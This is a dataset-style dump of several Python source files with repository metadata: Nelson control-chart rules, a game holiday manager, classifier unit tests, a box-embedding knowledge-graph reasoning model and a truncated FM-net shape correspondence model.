] | 3 | 2016-05-13T00:45:40.000Z | 2019-07-30T15:22:29.000Z | diligent/checks/nelson.py | stefanw/diligent-pandas | aaf74fc41bc9414e5e27f5a0e1b91d47613fdb38 | [
"MIT"
] | null | null | null | diligent/checks/nelson.py | stefanw/diligent-pandas | aaf74fc41bc9414e5e27f5a0e1b91d47613fdb38 | [
"MIT"
] | 1 | 2019-02-16T01:39:04.000Z | 2019-02-16T01:39:04.000Z | """
Implementation of the Nelson rules
https://en.wikipedia.org/wiki/Nelson_rules
"""
from collections import deque
import numpy as np
from ..diligent import registry
from ..utils import is_numeric
__all__ = ['nelson_rule_%d' % i for i in range(1, 9)]
@registry.register(name='Nelson Rule 1', tags='nelson')
@registry.register(name='Nelson Rule 2', tags='nelson')
@registry.register(name='Nelson Rule 3', tags='nelson')
@registry.register(name='Nelson Rule 4', tags='nelson')
@registry.register(name='Nelson Rule 5', tags='nelson')
@registry.register(name='Nelson Rule 6', tags='nelson')
@registry.register(name='Nelson Rule 7', tags='nelson')
@registry.register(name='Nelson Rule 8', tags='nelson')
| 31.303704 | 116 | 0.587317 | """
Implementation of the Nelson rules
https://en.wikipedia.org/wiki/Nelson_rules
"""
from collections import deque
import numpy as np
from ..diligent import registry
from ..utils import is_numeric
__all__ = ['nelson_rule_%d' % i for i in range(1, 9)]
@registry.register(name='Nelson Rule 1', tags='nelson')
def nelson_rule_1(series, std_mult=3, mean=None, std=None):
    """Nelson rule 1: yield a message for every point lying ``std_mult``
    standard deviations (default three) or more away from the mean.

    ``mean``/``std`` may be passed in to avoid recomputation; when omitted
    they are derived from the series itself. Non-numeric series yield
    nothing.
    """
    if not is_numeric(series):
        return
    mean = series.mean() if mean is None else mean
    std = series.std() if std is None else std
    spread = std_mult * std
    upper_template = 'At {}: {} is three standard deviations above the mean of {}'
    lower_template = 'At {}: {} is three standard deviations below the mean of {}'
    # Report all out-of-control points above the band first, then below.
    for label, value in series[series >= mean + spread].iteritems():
        yield upper_template.format(label, value, mean)
    for label, value in series[series <= mean - spread].iteritems():
        yield lower_template.format(label, value, mean)
@registry.register(name='Nelson Rule 2', tags='nelson')
def nelson_rule_2(series, threshold=9, mean=None):
    """Nelson rule 2: flag runs of ``threshold`` (default nine) or more
    consecutive points that all lie on the same side of the mean."""
    if not is_numeric(series):
        return
    message_below = 'At {}: {} data points in sequence are below the mean of {}'
    message_above = 'At {}: {} data points in sequence are above the mean of {}'
    if mean is None:
        mean = series.mean()
    # Lengths of the current above-mean / below-mean run and the index where
    # the current run started.
    above_counter = 0
    first_trend = None
    below_counter = 0
    for i, x in series.iteritems():
        if x > mean:
            # A below-the-mean run ends here; report it if it was long enough.
            if below_counter >= threshold:
                yield message_below.format(
                    first_trend, below_counter, mean)
            below_counter = 0
            if above_counter == 0:
                first_trend = i
            above_counter += 1
        elif x < mean:
            # An above-the-mean run ends here; report it if it was long enough.
            if above_counter >= threshold:
                yield message_above.format(
                    first_trend, above_counter, mean)
            above_counter = 0
            if below_counter == 0:
                first_trend = i
            below_counter += 1
        else:
            # NOTE(review): a point exactly on the mean resets both runs
            # without reporting them, even if one exceeded the threshold --
            # confirm this is intended.
            below_counter = 0
            above_counter = 0
    # Flush a run that extends to the end of the series.
    if above_counter >= threshold:
        yield message_above.format(
            first_trend, above_counter, mean)
    if below_counter >= threshold:
        yield message_below.format(
            first_trend, below_counter, mean)
@registry.register(name='Nelson Rule 3', tags='nelson')
def nelson_rule_3(series, threshold=6):
    """Nelson rule 3: flag runs of ``threshold`` (default six) or more
    consecutive points that are monotonically increasing or decreasing."""
    if not is_numeric(series):
        return
    message_inc = 'At {}: {} data points in sequence are increasing'
    message_dec = 'At {}: {} data points in sequence are decreasing'
    # Length of the current monotone run, the previous point, and the sign
    # (+1/-1/0) of the direction the run is moving in.
    trend_counter = 0
    last_value = None
    last_index = None
    first_row = None
    current_trend = None
    for i, x in series.iteritems():
        if last_value is None:
            # First point: nothing to compare against yet.
            last_value = x
            last_index = i
            continue
        trend = np.sign(x - last_value)
        if trend != current_trend:
            # Direction changed: report the finished run if long enough,
            # then start a new run at the previous point.
            if trend_counter >= threshold:
                if current_trend > 0:
                    yield message_inc.format(
                        first_row, trend_counter)
                elif current_trend < 0:
                    yield message_dec.format(
                        first_row, trend_counter)
            first_row = last_index
            trend_counter = 1  # the first point was in last iteration
            current_trend = np.sign(x - last_value)
        last_value = x
        last_index = i
        if trend == 0:
            # Equal consecutive values neither extend nor break the count.
            continue
        trend_counter += 1
    # Flush a run that extends to the end of the series.
    if trend_counter >= threshold:
        if current_trend > 0:
            yield message_inc.format(
                first_row, trend_counter)
        elif current_trend < 0:
            yield message_dec.format(
                first_row, trend_counter)
@registry.register(name='Nelson Rule 4', tags='nelson')
def nelson_rule_4(series, threshold=14):
    """Nelson rule 4: flag runs of ``threshold`` (default fourteen) or more
    consecutive points that alternate in direction (up, down, up, ...)."""
    if not is_numeric(series):
        return
    message = 'At {}: {} data points in sequence alternate in direction'
    current_trend = 0
    trend_counter = 0
    # Small ring buffers of the last three values/labels, used to recover
    # the index where an alternating run started.
    values = deque([], 3)
    indizes = deque([], 3)
    first_index = None
    for i, x in series.iteritems():
        values.append(x)
        indizes.append(i)
        if len(values) < 2:
            # Need at least two points to compute a direction.
            continue
        trend = np.sign(x - values[-2])
        # Increasing (1) + decreasing (-1) == 0
        alternation = current_trend + trend == 0
        if first_index is None and alternation:
            first_index = indizes[0]
            trend_counter = 3  # Trend started two rows before
        elif first_index is not None and alternation:
            trend_counter += 1
        elif first_index is not None and not alternation:
            # The alternation broke: report the run if it was long enough.
            if trend_counter >= threshold:
                yield message.format(
                    first_index, trend_counter)
            first_index = None
        current_trend = trend
    # Flush a run that extends to the end of the series.
    if first_index is not None and trend_counter >= threshold:
        yield message.format(
            first_index, trend_counter)
def nelson_rule_5_6(series, std_mult=2, window=3, threshold=2,
                    mean=None, std=None):
    """Shared implementation for Nelson rules 5 and 6.

    Slides a window of ``window`` points over the series and reports every
    window in which at least ``threshold`` points lie more than ``std_mult``
    standard deviations away from the mean; points above and below the band
    are counted (and reported) separately.
    """
    if not is_numeric(series):
        return
    mean = series.mean() if mean is None else mean
    std = series.std() if std is None else std
    band = std_mult * std
    upper_bound = mean + band
    lower_bound = mean - band
    above_template = 'At {}: {} out of {} points in a row are more than {} standard deviations above the mean.'
    below_template = 'At {}: {} out of {} points in a row are more than {} standard deviations below the mean.'
    window_labels = deque([], window)
    window_values = deque([], window)
    for label, value in series.iteritems():
        window_labels.append(label)
        window_values.append(value)
        if len(window_labels) < window:
            # Not enough history yet to fill a whole window.
            continue
        n_above = len([v for v in window_values if v > upper_bound])
        if n_above >= threshold:
            yield above_template.format(
                window_labels[0], n_above, window, std_mult)
        n_below = len([v for v in window_values if v < lower_bound])
        if n_below >= threshold:
            yield below_template.format(
                window_labels[0], n_below, window, std_mult)
@registry.register(name='Nelson Rule 5', tags='nelson')
def nelson_rule_5(series, mean=None, std=None):
    """Nelson rule 5: two out of three consecutive points more than two
    standard deviations from the mean on the same side."""
    rule_config = {'std_mult': 2, 'window': 3, 'threshold': 2}
    return nelson_rule_5_6(series, mean=mean, std=std, **rule_config)
@registry.register(name='Nelson Rule 6', tags='nelson')
def nelson_rule_6(series, mean=None, std=None):
    """Nelson rule 6: four out of five consecutive points more than one
    standard deviation from the mean on the same side."""
    rule_config = {'std_mult': 1, 'window': 5, 'threshold': 4}
    return nelson_rule_5_6(series, mean=mean, std=std, **rule_config)
def nelson_rule_7_8(series, std_mult=1, window=15, threshold=15, cmp=None,
                    message=None, mean=None, std=None):
    """Shared implementation for Nelson rules 7 and 8.

    Slides a window of ``window`` points over the series and, using the
    predicate ``cmp(lower, value, upper)``, tracks stretches where at least
    ``threshold`` points of every window satisfy the predicate; each such
    stretch is reported via ``message.format(first_index, count)``.
    """
    if not is_numeric(series):
        return
    if mean is None:
        mean = series.mean()
    if std is None:
        std = series.std()
    x_std = std_mult * std
    # Bounds of the +/- std_mult sigma band around the mean.
    below = mean - x_std
    above = mean + x_std
    indizes = deque([], window)
    values = deque([], window)
    # Start label of the current qualifying stretch and its running length.
    first_index = None
    count = 0
    for i, x in series.iteritems():
        indizes.append(i)
        values.append(x)
        if len(indizes) < window:
            # Not enough history yet to fill a whole window.
            continue
        count_within = len([v for v in values if cmp(below, v, above)])
        if first_index is None and count_within >= threshold:
            # A qualifying stretch begins at the start of this window.
            first_index = indizes[0]
            count = count_within
        elif first_index is not None and count_within >= threshold:
            count += 1
        elif first_index is not None:
            # The stretch ended: report it and reset.
            yield message.format(
                first_index, count)
            first_index = None
            count = 0
    # Flush a stretch that extends to the end of the series.
    if count > 0:
        yield message.format(
            first_index, count)
@registry.register(name='Nelson Rule 7', tags='nelson')
def nelson_rule_7(series, mean=None, std=None):
    """Nelson rule 7: fifteen points in a row all inside the one-sigma band
    around the mean (suspiciously low variation)."""
    def inside_band(lower, value, upper):
        # Point lies within one standard deviation of the mean.
        return lower <= value <= upper

    text = ('At {}: {} points in a row are all within 1 standard '
            'deviation of the mean on either side of the mean.')
    return nelson_rule_7_8(series, std_mult=1, window=15, threshold=15,
                           cmp=inside_band, message=text,
                           mean=mean, std=std)
@registry.register(name='Nelson Rule 8', tags='nelson')
def nelson_rule_8(series, mean=None, std=None):
    """Nelson rule 8: eight points in a row all outside the one-sigma band,
    on both sides of the mean."""
    def outside_band(lower, value, upper):
        # Point lies more than one standard deviation from the mean.
        return value < lower or value > upper

    text = ('At {}: {} points in a row exist with none within 1 '
            'standard deviation of the mean and the points are in both '
            'directions from the mean.')
    return nelson_rule_7_8(series, std_mult=1, window=8, threshold=8,
                           cmp=outside_band, message=text,
                           mean=mean, std=std)
| 7,508 | 0 | 222 |
907e0adfc0f120310bcbdc9d52f4a37f02b73a76 | 1,259 | py | Python | lib/coginvasion/holiday/HolidayManager.py | theclashingfritz/Cog-Invasion-Online-Dump | 2561abbacb3e2e288e06f3f04b935b5ed589c8f8 | [
"Apache-2.0"
] | 1 | 2020-03-12T16:44:10.000Z | 2020-03-12T16:44:10.000Z | lib/coginvasion/holiday/HolidayManager.py | theclashingfritz/Cog-Invasion-Online-Dump | 2561abbacb3e2e288e06f3f04b935b5ed589c8f8 | [
"Apache-2.0"
] | null | null | null | lib/coginvasion/holiday/HolidayManager.py | theclashingfritz/Cog-Invasion-Online-Dump | 2561abbacb3e2e288e06f3f04b935b5ed589c8f8 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: lib.coginvasion.holiday.HolidayManager
from panda3d.core import VirtualFileSystem, Filename
from direct.distributed.DistributedObjectGlobal import DistributedObjectGlobal
from direct.directnotify.DirectNotifyGlobal import directNotify
| 34.972222 | 104 | 0.732327 | # uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: lib.coginvasion.holiday.HolidayManager
from panda3d.core import VirtualFileSystem, Filename
from direct.distributed.DistributedObjectGlobal import DistributedObjectGlobal
from direct.directnotify.DirectNotifyGlobal import directNotify
class HolidayType:
    """Integer identifiers for the supported holiday events."""
    CHRISTMAS = 1
    HALLOWEEN = 2
class HolidayGlobals:
    """User-facing holiday strings."""
    # Announcement shown when the winter holiday is active.
    CHRISTMAS_TIME = 'Happy Winter Holidays! Winter has struck Toontown!'
    # NPC greeting; %s is substituted with the avatar's name by the caller.
    COACH_GREETING = 'Happy Holidays, %s! Here, take some snowballs!'
class HolidayManager(DistributedObjectGlobal):
    """Client-side global object that tracks the currently active holiday
    and mounts holiday-specific asset multifiles when one begins."""
    notify = directNotify.newCategory('HolidayManager')

    def __init__(self, cr):
        DistributedObjectGlobal.__init__(self, cr)
        # Bug fix: initialize the attribute so getHoliday() cannot raise
        # AttributeError when called before the server sends setHoliday.
        self.holiday = None

    def announceGenerate(self):
        """Ask the server which holiday (if any) is currently active."""
        DistributedObjectGlobal.announceGenerate(self)
        self.sendUpdate('requestHoliday', [])

    def setHoliday(self, holiday):
        """Record the active holiday; for Christmas, mount the winter
        asset multifile over the default assets."""
        self.holiday = holiday
        if holiday == HolidayType.CHRISTMAS:
            vfs = VirtualFileSystem.getGlobalPtr()
            vfs.mount(Filename('winter.mf'), '.', VirtualFileSystem.MFReadOnly)

    def getHoliday(self):
        """Return the active holiday id (see HolidayType), or None."""
        return self.holiday
0d4bdc468aa1a1f9a81f77398ae0f99cd3a04ab0 | 4,525 | py | Python | discomll/tests/tests_classification.py | romanorac/discomll | a4703daffb2ba3c9f614bc3dbe45ae55884aea00 | [
"Apache-2.0"
] | 103 | 2015-01-02T23:45:18.000Z | 2021-01-23T14:25:52.000Z | discomll/tests/tests_classification.py | romanorac/discomll | a4703daffb2ba3c9f614bc3dbe45ae55884aea00 | [
"Apache-2.0"
] | null | null | null | discomll/tests/tests_classification.py | romanorac/discomll | a4703daffb2ba3c9f614bc3dbe45ae55884aea00 | [
"Apache-2.0"
] | 10 | 2015-01-02T23:48:12.000Z | 2017-11-25T15:55:34.000Z | import unittest
import numpy as np
import Orange
from disco.core import result_iterator
import datasets
if __name__ == '__main__':
unittest.main()
| 40.765766 | 119 | 0.699448 | import unittest
import numpy as np
import Orange
from disco.core import result_iterator
import datasets
class Tests_Classification(unittest.TestCase):
    """Integration tests that compare discomll classifiers (run on Disco)
    against reference implementations: Orange for discrete naive Bayes and
    logistic regression, scikit-learn for Gaussian naive Bayes.

    NOTE: this is a Python 2 module (it uses the print statement).
    """

    @classmethod
    def setUpClass(self):
        # NOTE(review): the first parameter of a classmethod is conventionally
        # named `cls`, not `self`; behavior is unaffected.
        # Chunk the shared test datasets into Disco's distributed filesystem
        # once per test class, unless they are already present.
        import chunk_testdata
        from disco import ddfs
        ddfs = ddfs.DDFS()
        if not ddfs.exists("test:ex3"):
            print "Chunking test datasets to DDFS..."
            chunk_testdata.chunk_testdata()

    def test_naivebayes_breastcancer(self):
        # python -m unittest tests_classification.Tests_Classification.test_naivebayes_breastcancer
        from discomll.classification import naivebayes
        train_data1, test_data1 = datasets.breastcancer_disc_orange()
        train_data2, test_data2 = datasets.breastcancer_disc_discomll()
        # Compare for several values of the m-estimate smoothing parameter.
        for m in range(3):
            # Reference predictions from Orange's naive Bayes.
            learner = Orange.classification.bayes.NaiveLearner(m=m)
            classifier = learner(train_data1)
            predictions1 = [classifier(inst, Orange.classification.Classifier.GetBoth) for inst in test_data1]
            predictions1_target = [v[0].value for v in predictions1]
            predictions1_probs = [v[1].values() for v in predictions1]
            # Candidate predictions from discomll's naive Bayes on Disco.
            fitmodel_url = naivebayes.fit(train_data2)
            predictions_url = naivebayes.predict(test_data2, fitmodel_url, m=m)
            predictions2_target = []
            predictions2_probs = []
            for k, v in result_iterator(predictions_url):
                predictions2_target.append(v[0])
                predictions2_probs.append(v[1])
            # Labels must match exactly; probabilities up to float tolerance.
            self.assertListEqual(predictions1_target, predictions2_target)
            self.assertTrue(np.allclose(predictions1_probs, predictions2_probs))

    def test_naivebayes_breastcancer_cont(self):
        # python -m unittest tests_classification.Tests_Classification.test_naivebayes_breastcancer_cont
        from sklearn.naive_bayes import GaussianNB
        from discomll.classification import naivebayes
        x_train, y_train, x_test, y_test = datasets.breastcancer_cont(replication=1)
        train_data, test_data = datasets.breastcancer_cont_discomll(replication=1)
        # Reference probabilities from scikit-learn's Gaussian naive Bayes.
        clf = GaussianNB()
        probs_log1 = clf.fit(x_train, y_train).predict_proba(x_test)
        # Candidate probabilities from discomll.
        fitmodel_url = naivebayes.fit(train_data)
        prediction_url = naivebayes.predict(test_data, fitmodel_url)
        probs_log2 = [v[1] for _, v in result_iterator(prediction_url)]
        self.assertTrue(np.allclose(probs_log1, probs_log2, atol=1e-8))

    def test_log_reg_thetas(self):
        # python tests_classification.py Tests_Classification.test_log_reg_thetas
        from discomll.classification import logistic_regression
        train_data1 = datasets.ex4_orange()
        train_data2 = datasets.ex4_discomll()
        # Reference coefficients from Orange's Cholesky fitter.
        lr = Orange.classification.logreg.LogRegFitter_Cholesky(train_data1)
        thetas1 = lr[1]
        # Candidate coefficients from discomll.
        thetas_url = logistic_regression.fit(train_data2)
        thetas2 = [v for k, v in result_iterator(thetas_url["logreg_fitmodel"]) if k == "thetas"]
        self.assertTrue(np.allclose(thetas1, thetas2))

    def test_log_reg(self):
        # python tests_classification.py Tests_Classification.test_log_reg
        from discomll.classification import logistic_regression
        train_data1, test_data1 = datasets.breastcancer_cont_orange()
        train_data2, test_data2 = datasets.breastcancer_cont_discomll()
        # Reference model from Orange.
        learner = Orange.classification.logreg.LogRegLearner(fitter=Orange.classification.logreg.LogRegFitter_Cholesky)
        classifier = learner(train_data1)
        thetas1 = classifier.beta
        predictions1 = []
        probabilities1 = []
        for inst in test_data1:
            target, probs = classifier(inst, Orange.classification.Classifier.GetBoth)
            predictions1.append(target.value)
            probabilities1.append(probs.values())
        # Candidate model from discomll.
        thetas_url = logistic_regression.fit(train_data2, alpha=1e-8, max_iterations=10)
        thetas2 = [v for k, v in result_iterator(thetas_url["logreg_fitmodel"]) if k == "thetas"]
        results_url = logistic_regression.predict(test_data2, thetas_url)
        predictions2 = []
        probabilities2 = []
        for k, v in result_iterator(results_url):
            predictions2.append(v[0])
            probabilities2.append(v[1])
        # Coefficients, probabilities (looser tolerance) and labels must agree.
        self.assertTrue(np.allclose(thetas1, thetas2))
        self.assertTrue(np.allclose(probabilities1, probabilities2, atol=1e-5))
        self.assertListEqual(predictions1, predictions2)
# Allow running the suite directly: python tests_classification.py
if __name__ == '__main__':
    unittest.main()
| 4,170 | 176 | 23 |
8a2a0fe848a71d1e002a99358b587d9441c09903 | 7,400 | py | Python | smore/models/box.py | isabella232/smore | 02e5a89e84a805eed632eefbdecd957d95e202d4 | [
"Apache-2.0"
] | 78 | 2021-10-31T23:20:26.000Z | 2022-03-21T01:07:01.000Z | smore/models/box.py | google-research/smore | e4ba95a7466ef7d018987bce7688b77bf2ea7e4f | [
"Apache-2.0"
] | 4 | 2021-11-02T13:45:38.000Z | 2022-02-17T04:18:32.000Z | smore/models/box.py | pyg-team/smore | 02e5a89e84a805eed632eefbdecd957d95e202d4 | [
"Apache-2.0"
] | 15 | 2021-11-02T23:55:29.000Z | 2022-03-19T10:30:51.000Z | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import time
import pdb
from smore.models.kg_reasoning import KGReasoning
from smore.common.modules import Identity
from smore.common.embedding.sparse_embed import SparseEmbedding
from smore.common.torchext.ext_ops import box_dist_in, box_dist_out
| 44.848485 | 160 | 0.69 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import time
import pdb
from smore.models.kg_reasoning import KGReasoning
from smore.common.modules import Identity
from smore.common.embedding.sparse_embed import SparseEmbedding
from smore.common.torchext.ext_ops import box_dist_in, box_dist_out
class BoxOffsetIntersection(nn.Module):
    """Permutation-invariant (deep-sets style) intersection of box offsets.

    A small two-layer network produces a sigmoid gate from the set of input
    offset embeddings; the intersected offset is the element-wise minimum of
    the inputs scaled by that gate.
    """

    def __init__(self, dim):
        super(BoxOffsetIntersection, self).__init__()
        self.dim = dim
        # Single parameter tensor packing [w1; w2; b1; b2] row-wise.
        self.layers = nn.Parameter(torch.zeros(self.dim * 2 + 2, self.dim))
        # Xavier-init only the two weight matrices; biases stay zero.
        nn.init.xavier_uniform_(self.layers[:self.dim * 2, :])

    def forward(self, embeddings):
        weight_a, weight_b, bias_a, bias_b = torch.split(
            self.layers, [self.dim, self.dim, 1, 1], dim=0)
        hidden = F.relu(F.linear(embeddings, weight_a, bias_a.view(-1)))
        # Pool over the set dimension, then gate in (0, 1).
        pooled = hidden.mean(dim=0)
        gate = torch.sigmoid(F.linear(pooled, weight_b, bias_b.view(-1)))
        # Shrink the smallest per-coordinate offset by the learned gate.
        smallest = embeddings.min(dim=0).values
        return smallest * gate
class CenterIntersection(nn.Module):
    """Attention-based intersection of box centers.

    A small two-layer network scores each input center embedding; the
    intersected center is the softmax-weighted sum of the inputs.
    """

    def __init__(self, dim):
        super(CenterIntersection, self).__init__()
        self.dim = dim
        # Single parameter tensor packing [w1; w2; b1; b2] row-wise.
        self.layers = nn.Parameter(torch.zeros(self.dim * 2 + 2, self.dim))
        # Xavier-init only the two weight matrices; biases stay zero.
        nn.init.xavier_uniform_(self.layers[:self.dim * 2, :])

    def forward(self, embeddings):
        weight_a, weight_b, bias_a, bias_b = torch.split(
            self.layers, [self.dim, self.dim, 1, 1], dim=0)
        hidden = F.relu(F.linear(embeddings, weight_a, bias_a.view(-1)))  # (num_conj, dim)
        # Per-coordinate attention over the set dimension.
        weights = F.softmax(F.linear(hidden, weight_b, bias_b.view(-1)), dim=0)  # (num_conj, dim)
        return (weights * embeddings).sum(dim=0)
class BoxReasoning(KGReasoning):
    """Query2box-style KG reasoning: entities are points and queries are
    axis-aligned boxes (center + non-negative offset) in embedding space.

    The logit of an entity is ``gamma`` minus the L1 distance outside the
    query box minus ``cen`` times the (down-weighted) L1 distance inside it.
    """

    def __init__(self, nentity, nrelation, hidden_dim, gamma,
                 optim_mode, batch_size, test_batch_size=1, sparse_embeddings=None,
                 sparse_device='gpu', use_cuda=False, query_name_dict=None, box_mode=None, logit_impl='native'):
        """box_mode is a pair ``(activation, cen)``: the activation applied
        to relation offsets ('none'/'relu'/'softplus') and the in-box
        distance weight."""
        super(BoxReasoning, self).__init__(nentity=nentity, nrelation=nrelation, hidden_dim=hidden_dim,
                                           gamma=gamma, optim_mode=optim_mode, batch_size=batch_size,
                                           test_batch_size=test_batch_size,
                                           sparse_embeddings=sparse_embeddings, sparse_device=sparse_device,
                                           use_cuda=use_cuda, query_name_dict=query_name_dict,
                                           logit_impl=logit_impl)
        self.geo = 'box'
        self.entity_embedding = SparseEmbedding(nentity, self.entity_dim)
        activation, cen = box_mode
        self.cen = cen  # hyperparameter that balances the in-box distance and the out-box distance
        if activation == 'none':
            self.func = Identity
        elif activation == 'relu':
            self.func = F.relu
        elif activation == 'softplus':
            self.func = F.softplus
        else:
            # Bug fix: an unrecognized activation previously left self.func
            # undefined, causing a confusing AttributeError only at the first
            # relation projection. Fail fast with a clear message instead.
            raise ValueError("unsupported box_mode activation: {}".format(activation))
        self.offset_embedding = SparseEmbedding(nrelation, self.entity_dim)
        self.center_net = CenterIntersection(self.entity_dim)
        self.offset_net = BoxOffsetIntersection(self.entity_dim)
        # A box embedding has two components: center and offset.
        self.num_embedding_component = 2
        self.init_params()

    def named_sparse_embeddings(self):
        """Extend the parent's sparse-embedding list with the relation
        offset table when relations are configured as sparse ('r')."""
        list_sparse = super(BoxReasoning, self).named_sparse_embeddings()
        if 'r' in self.sparse_embeddings:
            list_sparse.append(("offset_embedding", self.offset_embedding))
        return list_sparse

    def named_dense_embedding_params(self):
        """Yield the parent's dense embedding params, plus the offset table
        params when relations are not sparse."""
        pgen = super(BoxReasoning, self).named_dense_embedding_params()
        for name, param in pgen:
            yield name, param
        if 'r' not in self.sparse_embeddings:
            for name, param in self.offset_embedding.named_parameters():
                yield name, param

    def to_device(self, device):
        """Move the model's modules and pre-allocated buffers to `device`."""
        super(BoxReasoning, self).to_device(device)
        self.center_net = self.center_net.to(device)
        self.offset_net = self.offset_net.to(device)
        # Reusable zero-offset and empty-logit buffers.
        self.zero_offset_tensor = torch.zeros([self.batch_size, 1, self.entity_dim]).to(device)
        self.empty_logit_tensor = torch.tensor([]).to(device)
        if 'r' not in self.sparse_embeddings or self.sparse_device == 'gpu':
            self.offset_embedding = self.offset_embedding.cuda(device)

    def init_params(self):
        """Initialize parent params plus the relation offset table."""
        super(BoxReasoning, self).init_params()
        self.offset_embedding.init_params(0, self.embedding_range)

    def share_memory(self):
        """Move parameters to shared memory for multi-process training."""
        super(BoxReasoning, self).share_memory()
        self.center_net.share_memory()
        self.offset_net.share_memory()
        self.offset_embedding.share_memory()

    def relation_projection(self, cur_embedding, relation_ids):
        """Project a box query through relations: translate the center and
        grow the offset by the (activated) relation offset."""
        relation_embedding = self.relation_embedding(relation_ids).unsqueeze(1)
        offset_embedding = self.offset_embedding(relation_ids).unsqueeze(1)
        return [cur_embedding[0] + relation_embedding, cur_embedding[1] + self.func(offset_embedding)]

    def retrieve_embedding(self, entity_ids):
        '''
        Retrieve the box embeddings (center, zero offset) for the given
        entities: an anchor entity is a degenerate box of zero volume.

        Params:
            entity_ids: a list of entities indices
        '''
        embedding = self.entity_embedding(entity_ids)
        offset_embedding = torch.zeros_like(embedding).to(embedding.device)
        return [embedding.unsqueeze(1), offset_embedding.unsqueeze(1)]

    def intersection_between_stacked_embedding(self, stacked_embedding_list):
        """Intersect stacked box embeddings: the last dim packs
        [center | offset]; centers via attention, offsets via gated min."""
        embedding, offset_embedding = torch.chunk(stacked_embedding_list, 2, dim=-1)
        embedding = self.center_net(embedding)
        offset_embedding = self.offset_net(offset_embedding)
        return [embedding, offset_embedding]

    def native_cal_logit(self, entity_embedding, entity_feat, query_embedding):
        """Pure-PyTorch logit: gamma - dist_outside - cen * dist_inside,
        maxed over the query's box components."""
        assert entity_feat is None
        query_center_embedding, query_offset_embedding = query_embedding
        delta = (entity_embedding.unsqueeze(1) - query_center_embedding).abs()
        distance_out = F.relu(delta - query_offset_embedding)
        distance_in = torch.min(delta, query_offset_embedding)
        logit = self.gamma - torch.norm(distance_out, p=1, dim=-1) - self.cen * torch.norm(distance_in, p=1, dim=-1)
        logit = torch.max(logit, dim=1)[0]
        return logit

    def custom_cal_logit(self, entity_embedding, entity_feat, query_embedding):
        """Same logit as native_cal_logit, computed with the fused custom
        box-distance kernels (box_dist_out / box_dist_in)."""
        assert entity_feat is None
        query_center_embedding, query_offset_embedding = query_embedding
        d1 = box_dist_out(entity_embedding, query_center_embedding, query_offset_embedding)
        d2 = box_dist_in(entity_embedding, query_center_embedding, query_offset_embedding)
        logit = self.gamma - d1 - self.cen * d2
        logit = torch.max(logit, dim=1)[0]
        return logit
| 5,460 | 720 | 181 |
b5ba6ef777fde42cecd1a31dc630290cdbebe0ef | 2,343 | py | Python | Learning Correspondence of Synthetic Shapes/models.py | tbredbenner/unsupervised_learning_of_dense_shape_correspondence | 440643d633a6db3f947ac71a247c8083cb3aeadc | [
"MIT"
] | 84 | 2019-03-16T13:08:25.000Z | 2022-02-06T11:11:39.000Z | Learning Correspondence of Synthetic Shapes/models.py | tbredbenner/unsupervised_learning_of_dense_shape_correspondence | 440643d633a6db3f947ac71a247c8083cb3aeadc | [
"MIT"
] | 11 | 2019-09-14T02:54:29.000Z | 2022-01-13T01:42:29.000Z | Learning Correspondence of Synthetic Shapes/models.py | tbredbenner/unsupervised_learning_of_dense_shape_correspondence | 440643d633a6db3f947ac71a247c8083cb3aeadc | [
"MIT"
] | 20 | 2019-06-22T09:01:37.000Z | 2021-07-09T08:24:13.000Z | import tensorflow as tf
import numpy as np
from ops import *
flags = tf.app.flags
FLAGS = flags.FLAGS
def fmnet_model(phase, part_shot, model_shot, part_dist_map , model_dist_map, part2model_ind_gt, part_evecs, part_evecs_trans, model_evecs, model_evecs_trans):
    """Build FM-net model.
    Args:
        phase: train/test.
        part_shot: SHOT descriptor of source shape (part).
        model_shot: SHOT descriptor of target shape (model).
        dist_map: distance map on target shape to evaluate geodesic error
        part_evecs: eigenvectors on source shape
        part_evecs_trans: transposed part_evecs with mass matrix correction
        model_evecs: eigenvectors on target shape
        model_evecs_trans: transposed model_evecs with mass matrix correction
    Returns:
        net_loss, unsupervised_loss, safeguard_inverse, merged summaries,
        the soft correspondence matrix P_norm, and the dict of activations.
    """
    net = {}
    # Siamese stack of residual layers: scope.reuse_variables() makes the
    # same weights process both the part and the model descriptors.
    for i_layer in range(FLAGS.num_layers):
        with tf.variable_scope("layer_%d" % i_layer) as scope:
            if i_layer == 0:
                net['layer_%d_part' % i_layer] = res_layer(part_shot, dims_out=int(part_shot.shape[-1]), scope=scope,
                                                           phase=phase)
                scope.reuse_variables()
                net['layer_%d_model' % i_layer] = res_layer(model_shot, dims_out=int(model_shot.shape[-1]), scope=scope,
                                                            phase=phase)
            else:
                net['layer_%d_part' % i_layer] = res_layer(net['layer_%d_part' % (i_layer - 1)],
                                                           dims_out=int(part_shot.shape[-1]),
                                                           scope=scope, phase=phase)
                scope.reuse_variables()
                net['layer_%d_model' % i_layer] = res_layer(net['layer_%d_model' % (i_layer - 1)],
                                                            dims_out=int(part_shot.shape[-1]),
                                                            scope=scope, phase=phase)
    # project output features on the shape Laplacian eigen functions
    layer_C_est = i_layer + 1  # grab current layer index
